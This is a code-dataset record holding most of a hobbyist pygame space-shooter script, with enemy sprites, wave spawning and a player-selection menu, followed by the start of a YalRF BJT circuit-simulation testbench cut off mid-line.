x\r\n self.y = y\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = tim_stats['image1']\r\n self.image2 = tim_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.speed = tim_stats['speed']\r\n self.pitch = tim_stats['pitch']\r\n self.roll = tim_stats['roll']\r\n self.shoot_rate = tim_stats['shoot_rate']\r\n self.costume_rate = tim_stats['costume_rate']\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n \r\n def loop(self):\r\n if self.y >= 1000:\r\n wave_to_do_list.append('tim')\r\n bad_guys.remove(self)\r\n \r\n self.y = self.y + self.speed\r\n self.x = self.x + ((math.cos(self.y * self.roll)) * self.pitch)\r\n if self.d.count_loop(self.costume_rate):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n if 
self.g.count_loop(self.shoot_rate):\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,180))\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bob(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, y, direction):\r\n self.health = bob_stats['health']\r\n self.y = y\r\n self.speed = bob_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = bob_stats['image1']\r\n self.image2 = bob_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.pitch = bob_stats['pitch']\r\n self.roll = bob_stats['roll']\r\n #self.pitch2 = 2\r\n #self.roll2 = .01\r\n self.costume_speed = bob_stats['costume_rate']\r\n self.body_length = bob_stats['length']\r\n self.body_distance = bob_stats['distance']\r\n self.direction = direction\r\n if self.direction == 'left':\r\n self.x = 1500\r\n if self.direction == 'right':\r\n self.x = -100\r\n self.image1 = pygame.transform.rotate(self.image1, 180)\r\n self.image2 = pygame.transform.rotate(self.image2, 180)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [self.x,self.y]\r\n\r\n\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n\r\n \r\n def loop(self):\r\n #angle = 0\r\n if self.x >= 1700 or self.x <= -300:\r\n wave_to_do_list.append('bob')\r\n bad_guys.remove(self)\r\n if self.direction == 'left':\r\n self.x = self.x - self.speed\r\n if self.direction == 'right':\r\n self.x = self.x + self.speed\r\n self.y = self.y + ((math.cos(self.x * self.roll)) * self.pitch)\r\n if self.d.count_loop(self.costume_speed):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n if self.g.count_loop(self.body_distance):\r\n if self.direction == 'left':\r\n balls.append(bob_body(self.x + 10, self.y, self.body_length))\r\n if self.direction == 'right':\r\n balls.append(bob_body(self.x - 10, self.y, self.body_length))\r\n #angle = angle + ((math.cos(self.x * self.roll2)) * self.pitch2)\r\n #self.chosen_image = pygame.transform.rotate(self.chosen_image, angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\nclass bob_body(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y, length):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = bob_body_stats['image1']\r\n self.x = x\r\n self.y = y\r\n self.length = length\r\n self.turn_speed = 1\r\n self.d = count()\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n\r\n def loop(self):\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n if self.d.count(self.length):\r\n balls.remove(self)\r\n\r\n\r\n \r\nclass explosion(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = explosion_stats['image1']\r\n self.x = x\r\n self.y = y\r\n self.length = explosion_stats['length']\r\n self.turn_speed = 1\r\n self.d = count()\r\n\r\n \r\n\r\n def loop(self):\r\n screen.blit(self.image1, (self.x, self.y))\r\n if self.d.count(self.length):\r\n if self in explosions:\r\n explosions.remove(self)\r\n \r\n \r\n\r\nclass lill_tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y):\r\n if skin == 1:\r\n self.stats = 
lill_tim_stats\r\n else:\r\n self.stats = lill_tim2_stats\r\n self.health = self.stats['health']\r\n self.x = x\r\n self.y = y\r\n self.speed = self.stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = self.stats['image1']\r\n self.image2 = self.stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.pitch = self.stats['pitch']\r\n self.roll = self.stats['roll']\r\n self.skin = skin\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n\r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n\r\n def loop(self):\r\n if self.y >= 1000:\r\n if self.skin == 1:\r\n wave_to_do_list.append('lill_tim')\r\n else:\r\n wave_to_do_list.append('lill_tim2')\r\n bad_guys.remove(self)\r\n self.y = self.y + self.speed\r\n if self.skin == 2:\r\n self.x = self.x + ((math.cos(self.y * .025)) * self.pitch)\r\n if self.d.count_loop(self.stats['costume_rate']):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bad_bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y, angle):\r\n self.skins = {1 : ['bad_bullet.png',2,10], 2 : ['player2-1.png',0,15] }\r\n self.chosen_image = ((self.skins[skin])[0])\r\n self.x = x\r\n self.y = y\r\n self.speed = ((self.skins[skin])[1])\r\n self.accuracy = ((self.skins[skin])[2])\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = pygame.image.load(self.chosen_image)\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.angle_possibilities = (list(range((self.accuracy * -1), (self.accuracy + 1))))\r\n self.angle = random.choice(self.angle_possibilities)\r\n self.angle = self.angle + angle\r\n self.chosen_image = pygame.transform.rotate(self.chosen_image, self.angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n \r\n def hit(self):\r\n if self in bad_bullets:\r\n bad_bullets.remove(self)\r\n\r\n def loop(self):\r\n if self.y > 900:\r\n bad_bullets.remove(self)\r\n self.y = self.y + self.speed\r\n self.y_add = (self.speed*math.sin(math.radians(self.angle + 90)))\r\n self.x_add = (self.speed*math.cos(math.radians(self.angle + 90)))\r\n self.x = self.x + self.x_add\r\n self.y = self.y - self.y_add\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n \r\n\r\n\r\n\r\n \r\nclass player_bullet(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self, num, x, y):\r\n self.bullet = num\r\n self.chosen_image = (bullets[num])[0]\r\n self.x = x\r\n self.y = y\r\n self.bullet_speed = (bullets[num])[2]\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = pygame.image.load(self.chosen_image)\r\n self.d = count()\r\n self.accuracy = (bullets[num])[1]\r\n self.angle_possibilities = (list(range((self.accuracy * -1), (self.accuracy + 1))))\r\n self.angle = random.choice(self.angle_possibilities)\r\n pygame.transform.rotate(self.chosen_image, self.angle)\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n\r\n def hit(self):\r\n if self.bullet != 3:\r\n if self in good_bullets:\r\n good_bullets.remove(self)\r\n\r\n\r\n def loop(self):\r\n if self.y < -10:\r\n 
good_bullets.remove(self)\r\n #self.bullet_y = self.bullet_y - self.bullet_speed\r\n self.yl = (self.bullet_speed*math.sin(math.radians(self.angle + 90)))\r\n self.xl = (self.bullet_speed*math.cos(math.radians(self.angle + 90)))\r\n self.x = self.x + self.xl\r\n self.y = self.y - self.yl\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n \r\n \r\nclass stars(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self):\r\n self.map_x = 0\r\n self.map_y = -8001\r\n pygame.sprite.Sprite.__init__(self)\r\n \r\n self.scale_factor = 2.3\r\n \r\n global map_count \r\n if map_count == 0:\r\n self.map_y = -7200\r\n \r\n map_count = 1\r\n\r\n\r\n def loop(self):\r\n global map_count\r\n self.map_y = self.map_y + .5\r\n screen.blit(map_image, (self.map_x, self.map_y))\r\n if self.map_y == 0:\r\n \r\n map_count = map_count + 1\r\n \r\n effects.append(stars())\r\n if self.map_y >= 800:\r\n effects.remove(self)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#functions\r\n\r\ndef maskFromSurface(surface, threshold=127):\r\n return pygame.mask.from_surface(surface, threshold)\r\n\r\ndef clicked(image, x, y):\r\n if mouse_x > x:\r\n if mouse_x < (image.get_width() + x):\r\n if mouse_y > y:\r\n if mouse_y < (image.get_height() + y):\r\n if 'click' in events:\r\n events.remove('click')\r\n return(True)\r\n \r\ndef create_text(size, x, y, text):\r\n font = pygame.font.Font(None, size)\r\n size = font.size(text)\r\n ren = font.render(text, 0, fg, bg)\r\n screen.blit(ren, (x, y))\r\n return ren\r\n \r\n \r\ndef ask_player():\r\n global load_stage, preset, start_cycle, which, last_clicked, last_clicked2, last_clicked3\r\n global wave_count, progress, last_preset, game_ready\r\n pygame.init()\r\n create_text(100, 436, 0, name)\r\n if load_stage == 1:\r\n if clicked(create_text(150, 360, 350, 'Click To Play'), 360, 350):\r\n load_stage = load_stage + 1\r\n if load_stage == 2:\r\n if len(last_preset) != 0:\r\n if clicked(create_text(150, 360, 250, 'Last Settings'), 360, 250):\r\n load_stage = load_stage + 3\r\n preset = list(last_preset)\r\n if clicked(create_text(150, 360, 450, 'New Settings'), 360, 450):\r\n load_stage = load_stage + 1\r\n else:\r\n load_stage = load_stage + 1\r\n if load_stage == 3:\r\n if clicked(create_text(150, 475, 100, '1 Player'), 475, 100):\r\n load_stage = load_stage + 1\r\n preset.append(1)\r\n if clicked(create_text(150, 475, 250, '2 Player'), 475, 250):\r\n load_stage = load_stage + 1\r\n preset.append(2)\r\n if clicked(create_text(150, 475, 400, '3 Player'), 475, 400):\r\n load_stage = load_stage + 1\r\n preset.append(3)\r\n if clicked(create_text(150, 475, 550, '4 Player'), 475, 550):\r\n load_stage = load_stage + 1\r\n preset.append(4)\r\n if load_stage == 4:\r\n create_text(100, 520, 100, ('Player %s' % progress))\r\n y = 600\r\n x = 80\r\n space = 30\r\n scale_factor = 2\r\n if sgt.count_loop(10):\r\n \r\n if start_cycle == True:\r\n start_cycle = False\r\n which = 1\r\n else:\r\n start_cycle = True\r\n which = 0\r\n create_text(85, 80, 500, 'Choose Ship')\r\n create_text(85, 80, 100, 'Choose Gun')\r\n for t in (player_stats['skins']).keys():\r\n image = ((player_stats['skins'])[t])[which]\r\n new_width = int(image.get_width() * scale_factor)\r\n new_height = int(image.get_height() * scale_factor)\r\n image = 
pygame.transform.scale(image, (new_width, new_height))\r\n new_x = x + ((space + new_width) * (t - 1))\r\n screen.blit((image), (new_x, y))\r\n if t not in skin_l:\r\n screen.blit(pygame.transform.scale(cross_out, (new_width, new_height)), (new_x, y))\r\n else:\r\n if clicked(image, new_x, y):\r\n last_clicked = t\r\n if last_clicked == t:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (new_x, y))\r\n create_text(85, 1000, 100, 'Choose Keys')\r\n if clicked(create_text(60, 100, 200, '50 Cal'), 100, 200):\r\n last_clicked2 = 1\r\n if clicked(create_text(60, 100, 250, 'Chain Gun'), 100, 250):\r\n last_clicked2 = 2\r\n if clicked(create_text(60, 100, 300, 'Rail Gun'), 100, 300):\r\n last_clicked2 = 3\r\n if clicked(create_text(60, 100, 350, 'Shot Gun'), 100, 350):\r\n last_clicked2 = 4\r\n gun_dict = {1 : 162,2 : 212,3 : 262,4 : 312}\r\n for x in (gun_dict.keys()):\r\n if x == last_clicked2:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (100, gun_dict[x]))\r\n \r\n wasd = create_text(60, 1000, 200, 'WASD')\r\n if 'wasd' in controls_l:\r\n if clicked(wasd, 1000, 200):\r\n last_clicked3 = 'wasd'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (wasd.get_width(), wasd.get_height())), (1000, 200))\r\n tfgh = create_text(60, 1000, 250, 'TFGH')\r\n if 'tfgh' in controls_l:\r\n if clicked(tfgh, 1000, 250):\r\n last_clicked3 = 'tfgh'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (tfgh.get_width(), tfgh.get_height())), (1000, 250))\r\n ijkl = create_text(60, 1000, 300, 'IJKL')\r\n if 'ijkl' in controls_l:\r\n if clicked(ijkl, 1000, 300):\r\n last_clicked3 = 'ijkl'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (ijkl.get_width(), ijkl.get_height())), (1000, 300))\r\n arrow = create_text(60, 1000, 350, 'Arrows')\r\n if 'arrow' in controls_l:\r\n if clicked(arrow, 1000, 350):\r\n last_clicked3 = 'arrow'\r\n else:\r\n screen.blit(pygame.transform.scale(cross_out2, (arrow.get_width(), arrow.get_height())), (1000, 350))\r\n controls_dict = {'wasd' : 162, 'tfgh' : 212, 'ijkl' : 262, 'arrow' : 312}\r\n for x in (controls_dict.keys()):\r\n if x == last_clicked3:\r\n screen.blit(pygame.transform.scale(check_mark, (new_width, new_height)), (1000, controls_dict[x]))\r\n if clicked(create_text(200, 900, 500, 'Done'), 900, 500):\r\n if progress == preset[0]:\r\n load_stage = load_stage + 1\r\n else:\r\n progress = progress + 1\r\n if last_clicked == None:\r\n preset.append(skin_l[0])\r\n skin_l.remove(skin_l[0])\r\n else:\r\n preset.append(last_clicked)\r\n skin_l.remove(last_clicked)\r\n if last_clicked2 == None:\r\n preset.append(gun_l[0])\r\n else:\r\n preset.append(last_clicked2)\r\n if last_clicked3 == None:\r\n preset.append(controls_l[0])\r\n controls_l.remove(controls_l[0])\r\n else:\r\n preset.append(last_clicked3)\r\n controls_l.remove(last_clicked3)\r\n last_clicked = None\r\n last_clicked2 = None\r\n last_clicked3 = None\r\n if load_stage == 5:\r\n for k in waves.keys():\r\n if k <= 10:\r\n y_l = 100\r\n else: \r\n y_1 = 200\r\n x_l = k * 100\r\n if clicked(create_text(100, x_l, y_l, str(k)), x_l, y_l):\r\n wave_count = k - 1\r\n #if len(last_preset) == 0:\r\n last_preset = list(preset)\r\n game_ready = True\r\n \r\n \r\ndef kill():\r\n global kills\r\n kills = kills + 1\r\n\r\ndef stop_watch():\r\n global hours, minutes, seconds\r\n seconds = seconds + 1\r\n if seconds == 60:\r\n seconds = 0\r\n minutes = minutes + 1\r\n if minutes == 60:\r\n minutes = 0\r\n hours = hours + 1\r\n \r\ndef 
damage_(damages):\r\n global damage\r\n damage = damage + damages\r\n\r\ndef touching(s1,s2):\r\n offset = [(int(s1.origin[0] - s2.origin[0]) // 1), (int(s1.origin[1] - s2.origin[1]) // 1)]\r\n if s2.mask.overlap_area(s1.mask, (offset)) != 0:\r\n return True\r\n \r\ndef run_wave():\r\n global wave_done\r\n global wave_count\r\n if len(wave_to_do_list) == 0:\r\n wave_timer1.reset_timer()\r\n wave_timer2.reset_timer()\r\n if len(wave_to_do_list) == 0 and len(boss_to_do_list) == 0 and len(bad_guys) == 0 and len(bombs) == 0:\r\n wave_done = True\r\n if wave_count != waves.keys():\r\n wave_count = wave_count + 1\r\n wave_()\r\n print(waves[wave_count])\r\n f = (waves[wave_count])[2]\r\n g = (waves[wave_count])[3]\r\n h = (waves[wave_count])[4]\r\n v = (waves[wave_count])[5]\r\n j = (waves[wave_count])[6]\r\n b = (waves[wave_count])[7]\r\n \r\n for x in range(f):\r\n wave_to_do_list.append('lill_tim')\r\n for x in range(g):\r\n wave_to_do_list.append('lill_tim2')\r\n for x in range(h):\r\n wave_to_do_list.append('tim')\r\n for x in range(j):\r\n wave_to_do_list.append('bob')\r\n for x in range(v):\r\n wave_to_do_list.append('bomb')\r\n if b != None:\r\n boss_to_do_list.append(b)\r\n \r\n \r\n if wave_timer1.count(((60 * (waves[wave_count])[1]))):\r\n wave_done = False\r\n if not wave_done:\r\n if wave_timer2.count_loop((waves[wave_count])[0]):\r\n p = random.choice(wave_to_do_list)\r\n if p == 'tim':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(tim(1,x,-100)) \r\n if p == 'lill_tim':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(lill_tim(1,x,-100))\r\n if p == 'lill_tim2':\r\n x = random.choice(list(range(0, 1400)))\r\n bad_guys.append(lill_tim(2,x,-100))\r\n if p == 'bob':\r\n y = random.choice(list(range(0, 800)))\r\n direction = random.choice(('left','right'))\r\n bad_guys.append(bob(1,y,direction))\r\n if p == 'bomb':\r\n x = random.choice(list(range(0, 1400)))\r\n bombs.append(bomb(x,-100))\r\n wave_to_do_list.remove(p)\r\n if len(wave_to_do_list) == 0 and len(bad_guys) == 0 and len(bombs) == 0:\r\n if len(boss_to_do_list) == 1:\r\n if boss_to_do_list[0] == 'boss_tim':\r\n bad_guys.append(boss_tim())\r\n print('added boss')\r\n boss_to_do_list.remove(boss_to_do_list[0])\r\n \r\n\r\ndef wave_():\r\n global wave\r\n wave = wave + 1\r\n \r\n\r\ndef start_button():\r\n global game_on\r\n if 'space' in events or clicked(create_text(100, 350, 390, 'Ready!'), 350, 390):\r\n game_on = True\r\n \r\ndef game_over():\r\n pygame.init()\r\n font1 = pygame.font.Font(None, 100)\r\n text1 = \"Game Over\"\r\n size1 = font1.size(text1)\r\n ren1 = font1.render(text1, 0, fg, bg)\r\n screen.blit(ren1, (350, 390))\r\n\r\ndef search_events():\r\n global mouse_x\r\n global mouse_y\r\n keys_dict = {'space' : pygame.K_SPACE,\r\n 'up' : pygame.K_UP,\r\n 'down' : pygame.K_DOWN,\r\n 'left' : pygame.K_LEFT,\r\n 'right' : pygame.K_RIGHT,\r\n 'tab' : pygame.K_TAB,\r\n 'clear' : pygame.K_CLEAR,\r\n 'return' : pygame.K_RETURN,\r\n '=' : pygame.K_EQUALS,\r\n '`' : pygame.K_BACKQUOTE,\r\n ']' : pygame.K_RIGHTBRACKET,\r\n '.' 
: pygame.K_PERIOD,\r\n 'delete' : pygame.K_DELETE,\r\n '/' : pygame.K_SLASH,\r\n '-' : pygame.K_MINUS,\r\n '[' : pygame.K_LEFTBRACKET,\r\n ',' : pygame.K_COMMA,\r\n ';' : pygame.K_SEMICOLON,\r\n 'backspace' : pygame.K_BACKSPACE,\r\n '1' : pygame.K_1,\r\n '2' : pygame.K_2,\r\n '3' : pygame.K_3,\r\n '4' : pygame.K_4,\r\n '5' : pygame.K_5,\r\n '6' : pygame.K_6,\r\n '7' : pygame.K_7,\r\n '8' : pygame.K_8,\r\n '9' : pygame.K_9,\r\n '0' : pygame.K_0,\r\n 'q' : pygame.K_q,\r\n 'w' : pygame.K_w,\r\n 'e' : pygame.K_e,\r\n 'r' : pygame.K_r,\r\n 't' : pygame.K_t,\r\n 'y' : pygame.K_y,\r\n 'u' : pygame.K_u,\r\n 'i' : pygame.K_i,\r\n 'o' : pygame.K_o,\r\n 'p' : pygame.K_p,\r\n 'a' : pygame.K_a,\r\n 's' : pygame.K_s,\r\n 'd' : pygame.K_d,\r\n 'f' : pygame.K_f,\r\n 'g' : pygame.K_g,\r\n 'h' : pygame.K_h,\r\n 'j' : pygame.K_j,\r\n 'k' : pygame.K_k,\r\n 'l' : pygame.K_l,\r\n 'z' : pygame.K_z,\r\n 'x' : pygame.K_x,\r\n 'c' : pygame.K_c,\r\n 'v' : pygame.K_v,\r\n 'b' : pygame.K_b,\r\n 'n' : pygame.K_n,\r\n 'm' : pygame.K_m}\r\n keys = list(keys_dict.keys())\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n global running\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n for k in keys:\r\n if event.key == keys_dict[k]:\r\n events.append(k)\r\n if event.type == pygame.KEYUP:\r\n for k in keys:\r\n if event.key == keys_dict[k]:\r\n try:\r\n events.remove(k)\r\n except:\r\n pass\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n events.append('click')\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n try:\r\n events.remove('click')\r\n except:\r\n pass\r\n (mouse_x, mouse_y) = pygame.mouse.get_pos()\r\ndef display_wave():\r\n fg = 250, 240, 230\r\n bg = 5, 5, 5\r\n pygame.init()\r\n font1 = pygame.font.Font(None, 40)\r\n text1 = \"Wave: %s\" % wave_count\r\n text2 = \"Bad guys alive: %s\" % (len(bad_guys) + len(wave_to_do_list) + len(bombs))\r\n size1 = font1.size(text1)\r\n size2 = font1.size(text2)\r\n ren2 = font1.render(text2, 0, fg, bg)\r\n ren1 = font1.render(text1, 0, fg, bg)\r\n screen.blit(ren2, (0, 0))\r\n screen.blit(ren1, (1200, 0))\r\n \r\ndef create_players():\r\n global death_counts\r\n for x in reverse(list(range(preset[0]))):\r\n x = x + 1\r\n x_values = {1 : 700, 2 : 750, 3 : 800, 4 : 850}\r\n good_guys.append(player(x,preset.pop(-3),preset.pop(),x_values[x],350,preset.pop()))\r\n \r\n death_counts = True\r\n#(self, num, skin, cntr, x, y, gun)\r\n\r\n\r\ndef show_stats():\r\n create_text(100, 300, 200, 'Kills: %s' % kills)\r\n create_text(100, 300, 300, 'Damage: %s' % damage)\r\n create_text(100, 300, 400, 'Waves: %s' % wave)\r\n create_text(100, 300, 500, 'Time: %s:%s:%s' % (hours, minutes, seconds))\r\n if clicked(create_text(200, 900, 500, 'Done'), 900, 500):\r\n set_variables()\r\n elif 'space' in events:\r\n set_variables()\r\n \r\n \r\ndef display(image, x, y):\r\n offsetx = image.get_width() // 2\r\n offsety = image.get_height() // 2\r\n x2 = x - offsetx\r\n y2 = y - offsety\r\n screen.blit(image, (x - offsetx, y - offsety))\r\n origin = [x2, y2]\r\n return origin\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n global game_started, death_counts, counting\r\n screen.fill(screen_colour)\r\n search_events()\r\n if counting:\r\n stop_watch()\r\n if game_ready:\r\n if len(waves.keys()) < wave_count:\r\n if game_over_timer.count(240):\r\n screen.fill(screen_colour)\r\n counting = False\r\n create_text(100, 300, 0, 'You Win!')\r\n show_stats()\r\n if not game_started:\r\n counting = True\r\n start_game()\r\n game_started = True\r\n print('game started')\r\n for x in 
effects:\r\n x.loop()\r\n for y in balls:\r\n y.loop()\r\n for x in good_guys:\r\n x.loop()\r\n for p in bad_guys:\r\n if touching(x, p):\r\n x.hit()\r\n for p in balls:\r\n if touching(x, p):\r\n x.hit()\r\n for p in bad_bullets:\r\n if touching(x, p):\r\n x.hit()\r\n p.hit()\r\n for x in bad_guys:\r\n x.loop()\r\n for x in bombs:\r\n x.loop()\r\n for p in good_guys:\r\n if touching(p, x):\r\n print('oof')\r\n p.hit()\r\n x.trigger()\r\n if p.x > (x.x - bomb_stats['range']) and p.x < (x.x + bomb_stats['range']):\r\n if p.y > (x.y - bomb_stats['range']) and p.y < (x.y + bomb_stats['range']):\r\n print('in range')\r\n x.trigger()\r\n for p in good_bullets:\r\n if touching(p, x):\r\n p.hit()\r\n x.hit((bullets[p.bullet])[4])\r\n explosions.append(explosion(p.x - 20, p.y - 30))\r\n for x in good_bullets:\r\n x.loop()\r\n for p in bad_guys:\r\n if touching(x, p):\r\n explosions.append(explosion(x.x - 20, x.y - 30))\r\n x.hit()\r\n p.hit((bullets[x.bullet])[4])\r\n damage_((bullets[x.bullet])[4])\r\n for x in bad_bullets:\r\n x.loop()\r\n for x in explosions:\r\n x.loop()\r\n for x in time_outs:\r\n x.loop()\r\n if not game_on:\r\n start_button()\r\n if death_counts:\r\n if len(good_guys) == 0:\r\n game_over()\r\n if game_over_timer.count(240):\r\n print('game over')\r\n counting = False\r\n screen.fill(screen_colour)\r\n create_text(100, 300, 0, 'Game Over')\r\n show_stats()\r\n \r\n \r\n \r\n if game_on:\r\n# try:\r\n run_wave()\r\n# except:\r\n \r\n# if len(waves.keys()) < wave_count:\r\n# if game_over_timer.count(240):\r\n# screen.fill(screen_colour)\r\n# counting = False\r\n# create_text(100, 300, 0, 'You Win!')\r\n# show_stats()\r\n \r\n# else: \r\n# print('Error, run_wave Failed')\r\n if counting:\r\n display_wave()\r\n \r\n else:\r\n ask_player()\r\n pygame.display.update()\r\n clock.tick(fps)\r\n\r\n\r\n\r\n\r\ndef start_game():\r\n \r\n create_players()\r\n if scrolling_background:\r\n effects.append(stars())\r\n \r\n\r\n\r\ndef quit_game():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef game_logic():\r\n if not debugging_mode:\r\n try:\r\n while running:\r\n main()\r\n quit_game()\r\n except:\r\n try:\r\n print('There has been an error in the game')\r\n quit_game()\r\n except:\r\n print('The game could not auto log-out. 
Press the minus sign if the game window is still open and exit out of the python shell')\r\n else:\r\n while running:\r\n main()\r\n quit_game() \r\n\r\n\r\n#setup functions\r\n\r\ndef get_angle(x,y,newx,newy):\r\n x1 = newx - x\r\n y1 = newy - y\r\n angle1 = math.degrees(math.atan(y1 / x1))\r\n if x1 > 0 and y1 > 0:\r\n angle2 = 360 - angle1\r\n print('quadrant 4')\r\n elif x1 > 0 and y1 < 0:\r\n print('quadrant 1')\r\n angle2 = angle1 * -1\r\n elif x1 < 0 and y1 > 0:\r\n print('quadrant 3')\r\n angle2 = (angle1 * -1) + 180\r\n elif x1 < 0 and y1 < 0:\r\n angle2 = 180 - 45\r\n print('quadrant 2')\r\n \r\n else:\r\n if x1 == 0:\r\n if y1 > 0:\r\n angle2 = 270\r\n if y1 < 0:\r\n angle2 = 90\r\n if y1 == 0:\r\n if x1 > 0:\r\n angle2 = 0\r\n if x1 < 0:\r\n angle2 = 180\r\n return angle2\r\n\r\n\r\n\r\ndef glide_to(x, y, newx, newy, speed):\r\n angle = get_angle(x,y,newx,newy)\r\n if range_(x, newx, speed * 1.5) and range_(y, newy, speed * 1.5):\r\n return [newx,newy,True]\r\n else:\r\n vals = move_forward(speed, angle)\r\n return [vals[0],vals[1],False]\r\n\r\ndef move_forward(speed,angle):\r\n y = (speed*math.sin(math.radians(angle)))\r\n x = (speed*math.cos(math.radians(angle)))\r\n return [x, -(y)]\r\n \r\ndef range_(num1, num2, val):\r\n if num1 > (num2 - val) and num1 < (num2 + val):\r\n return True\r\n\r\n\r\ndef round_(a):\r\n a = a // 1\r\n return a\r\n\r\n\r\n\r\ndef reverse(lst):\r\n return [ele for ele in reversed(lst)]\r\n\r\n#dumb game stuff\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nset_variables()\r\ngame_logic()\r\n","sub_path":"sadistic stars1.1/sadistic stars1.2.py","file_name":"sadistic stars1.2.py","file_ext":"py","file_size_in_byte":52259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404521339","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport setup\nfrom yalrf import YalRF\n\ny = YalRF('BJT AC Testbench')\n\nv1 = y.add_vdc('V1', 'nc', 'gnd', 1)\n\nc1 = y.add_capacitor('C1', 'ny', 'nb', 1e-6)\ni1 = y.add_iac('I1', 'ny', 'gnd', 1)\n\nl1 = y.add_inductor('L1', 'nx', 'nb', 1e-3)\nv2 = y.add_vdc('V2', 'nx', 'gnd', 0.75)\n\nq1 = y.add_bjt('Q1', 'nb', 'nc', 'gnd')\nq1.options['Is'] = 8.11e-14\nq1.options['Nf'] = 1\nq1.options['Nr'] = 1\nq1.options['Ikf'] = 0.5\nq1.options['Ikr'] = 0.225\nq1.options['Vaf'] = 113\nq1.options['Var'] = 24\nq1.options['Ise'] = 1.06e-11\nq1.options['Ne'] = 2\nq1.options['Isc'] = 0\nq1.options['Nc'] = 2\nq1.options['Bf'] = 205\nq1.options['Br'] = 4\n\nq1.options['Cje'] = 2.95e-11\nq1.options['Cjc'] = 1.52e-11\nq1.options['Cjs'] = 0.\n\ndc1 = y.add_dc_analysis('DC1')\nxdc = y.run('DC1')\n\nac1 = y.add_ac_analysis('AC1', start=10e6, 